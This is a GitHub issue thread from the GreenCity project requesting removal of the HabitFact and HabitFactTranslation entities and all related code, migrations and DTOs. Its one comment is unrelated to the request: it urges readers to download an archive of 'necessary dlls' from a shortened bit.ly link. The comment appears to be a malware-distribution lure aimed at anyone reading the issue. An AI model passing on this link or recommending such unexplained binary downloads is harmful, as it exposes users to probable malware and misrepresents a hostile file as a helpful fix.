### ISSUE TITLE
[HabitFact] Remove HabitFact and HabitFactTranslation Entities and Related Functionality

### ISSUE THREAD

**Issue by Maryna-511750** [ita-social-projects/GreenCity#7476]
**Description of a Change request:**
Remove the HabitFact and HabitFactTranslation entities from the codebase, including all related functionality, to streamline the project and eliminate unused components.

**Details:**
- Delete the HabitFact and HabitFactTranslation entities.
- Remove all repository, service, and controller logic related to these entities.
- Update any database migration scripts (e.g., Liquibase or Flyway) to reflect the removal of these tables.
- Clean up any associated DTOs, mappers, and other related classes or methods.
- Ensure that any references to HabitFact and HabitFactTranslation in the application are removed.
- Test the application to confirm that the removal does not introduce any errors.

**Acceptance Criteria**
- The HabitFact and HabitFactTranslation entities and all related functionality are fully removed from the project.
- The project builds successfully and all tests pass without errors.
- There are no broken dependencies or references to the removed entities.

Epic: [910](https://github.com/ita-social-projects/GreenCity/issues/910)

**Comment by websquadpro** [comment]
download
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive
